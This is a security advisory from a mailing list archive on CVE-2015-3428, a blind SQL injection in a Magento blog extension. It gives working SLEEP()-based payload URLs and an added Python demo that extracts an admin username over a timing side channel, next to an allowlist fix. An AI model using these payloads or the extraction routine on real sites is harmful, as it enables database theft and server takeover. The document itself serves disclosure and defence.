WebApp Sec mailing list archives

SQL Injection within popular Magento blog extension (CVE-2015-3428)


From: AppCheck Advisories <advisories () appcheck-ng com>
Date: Thu, 28 May 2015 14:52:19 +0000

Background
======================

The aheadWorks Blog extension for Magento prior to version 1.3.10 is vulnerable to a critical SQL Injection security 
flaw. A remote unauthenticated attacker could exploit this vulnerability to take complete control of the affected 
Magento server and database. With almost 80,000 downloads at the time of writing, the affected component is the most 
popular blog component available via Magento Connect.

Advisory Link:  http://appcheck-ng.com/critical-security-flaw-patched-in-magento-blog-extension-cve-2015-3428/
Vendor Link:    http://www.magentocommerce.com/magento-connect/blog-community-edition-by-aheadworks.html


Technical Details
======================

The SQL Injection flaw was discovered using the AppCheck NG scanner during preparation for a security seminar. The 
exercise involved configuring several popular CMS platforms including WordPress, Joomla, Drupal and Magento along with 
the most popular plugins available at the time for each platform.

A default AppCheck NG scan was then performed against each system to demonstrate our ability to discover previously 
undisclosed security flaws using AppCheck NG. Among the discovered vulnerabilities was a Blind SQL Injection flaw 
within the aheadWorks Blog extension component. AppCheck was able to identify the flaw by triggering a measurable time 
delay using the MySQL "SLEEP()" function. 

For example, the following URI will trigger a 10 second time delay when accessed using a web browser:

        http://magento_site/blog?dir=desc&order=user AND 1=((SELECT 1 FROM (SELECT SLEEP(10))A)) OR 1234=4321

Compare this with the following URI, which triggers a 2 second delay:

        http://magento_site/blog?dir=desc&order=user AND 1=((SELECT 1 FROM (SELECT SLEEP(2))A)) OR 1234=4321

AppCheck NG employs a range of methods to detect blind SQL injection, including time delay inference. Each suspected 
flaw is confirmed through 15 validation cycles to eliminate false positives.

Exploit
======================

An attacker could exploit this flaw using publicly available tools such as sqlmap (http://sqlmap.org/). 
By extracting usernames and password hashes from the admin_user table, it is possible to recover Magento 
administrator credentials through an offline password-cracking attack. A demonstration of this flaw is performed at 
our free application security seminar. See the following URL for our next event: http://appcheck-ng.com/events/
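The following is an added example, not aheadWorks or AppCheck code, covering the Technical Details and Exploit 
sections above. It reconstructs the vulnerable pattern (a request value pasted into ORDER BY), runs the advisory's own 
SLEEP() payload and measures the delay, recovers a value from a constructed admin_user table one character at a time 
the way sqlmap does, and contrasts the usual hardening for a sort parameter (an allowlist, because identifiers cannot 
be bound as query parameters). The vendor's actual patch is not reproduced here. The example runs offline on SQLite: 
SLEEP() is registered as a Python function (MySQL has it built in), and the MySQL form IF(ASCII(SUBSTRING(..)) > n, 
SLEEP(d), 0) is written as CASE WHEN unicode(substr(..)) > n THEN SLEEP(d) ELSE 0 END. The table and column names 
(posts, user, admin_user, username) and the sample rows are assumptions.

```python
"""Time-based blind SQL injection through a sortable `order` parameter.

Added example, not aheadWorks or AppCheck code.  Table and column names
(posts, user, admin_user, username) and all rows are constructed.
"""
import sqlite3
import time

SLEEP_SECONDS = 0.05  # short so the demo finishes quickly; scanners use 2-10 s

# The `order` value from the advisory, with the delay made a template.
PAGE_PAYLOAD = "user AND 1=((SELECT 1 FROM (SELECT SLEEP({d}))A)) OR 1234=4321"


def make_db():
    """In-memory database with constructed sample rows (not real Magento data)."""
    conn = sqlite3.connect(":memory:")

    def sleep(seconds):  # stand-in for MySQL SLEEP(): blocks, then returns 0
        time.sleep(seconds)
        return 0

    conn.create_function("SLEEP", 1, sleep)
    conn.executescript("""
        CREATE TABLE posts (id INTEGER, title TEXT, user INTEGER);
        INSERT INTO posts VALUES (1, 'Hello', 1), (2, 'News', 2), (3, 'Sale', 1);
        CREATE TABLE admin_user (username TEXT, password TEXT);
        INSERT INTO admin_user VALUES ('admin', 'not-a-real-hash');
    """)
    return conn


def vulnerable_query(conn, order, direction):
    """The injectable pattern: request values concatenated into the SQL text."""
    sql = f"SELECT id, title FROM posts ORDER BY {order} {direction}"
    return conn.execute(sql).fetchall()


def timed(conn, order, direction="desc"):
    """Run the vulnerable query and report wall-clock time, as a scanner would."""
    start = time.monotonic()
    rows = vulnerable_query(conn, order, direction)
    return rows, time.monotonic() - start


def oracle(conn, condition):
    """Answer a yes/no question about the database using only response time:
    the injected CASE sleeps when `condition` is true and returns at once otherwise."""
    order = (f"user AND 1=(SELECT CASE WHEN {condition} THEN SLEEP({SLEEP_SECONDS}) "
             f"ELSE 0 END) OR 1234=4321")
    _, elapsed = timed(conn, order)
    return elapsed >= SLEEP_SECONDS


def extract(conn, expr, length):
    """Recover the string produced by SQL expression `expr` one character at a
    time, binary-searching the code point (about 7 timed queries per character)."""
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(conn, f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


# Hardened form: map request values onto fixed identifiers and reject the rest.
ALLOWED_ORDER = {"title": "title", "user": "user", "id": "id"}
ALLOWED_DIR = {"asc": "ASC", "desc": "DESC"}


def safe_query(conn, order, direction):
    """Same query built only from allowlisted identifiers; raises on anything else."""
    if order not in ALLOWED_ORDER or direction.lower() not in ALLOWED_DIR:
        raise ValueError(f"rejected sort parameters: {order!r}, {direction!r}")
    sql = (f"SELECT id, title FROM posts ORDER BY "
           f"{ALLOWED_ORDER[order]} {ALLOWED_DIR[direction.lower()]}")
    return conn.execute(sql).fetchall()


def run_demo():
    """Exercise the delay, the extraction and the allowlist; return the results."""
    conn = make_db()
    _, fast = timed(conn, "user")
    _, slow = timed(conn, PAGE_PAYLOAD.format(d=SLEEP_SECONDS))
    username = extract(conn, "SELECT username FROM admin_user LIMIT 1", 5)
    try:
        safe_query(conn, PAGE_PAYLOAD.format(d=SLEEP_SECONDS), "desc")
        rejected = False
    except ValueError:
        rejected = True
    return {"benign_s": fast, "payload_s": slow, "username": username, "rejected": rejected}


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

Running the script prints a sub-millisecond time for the benign sort, a delay of at least SLEEP_SECONDS for the 
advisory's payload, the recovered username, and confirmation that the allowlisted builder refused the payload. The 
point of the allowlist is that column names and sort directions cannot be passed as bound parameters, so the only safe 
way to use request input in ORDER BY is to translate it through a fixed table and fail closed on anything unexpected.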

Solution
======================

This flaw was reported to aheadWorks on 22 April 2015. A fix was made available on 27 May 2015 and can be 
downloaded via Magento Connect.